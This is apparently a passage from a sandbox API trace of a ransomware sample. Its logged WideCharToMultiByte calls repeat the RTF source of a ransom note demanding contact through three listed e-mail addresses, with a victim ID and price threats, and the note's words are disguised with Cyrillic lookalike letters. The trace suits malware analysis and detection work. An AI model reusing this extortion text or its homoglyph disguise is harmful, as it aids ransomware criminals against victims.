st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 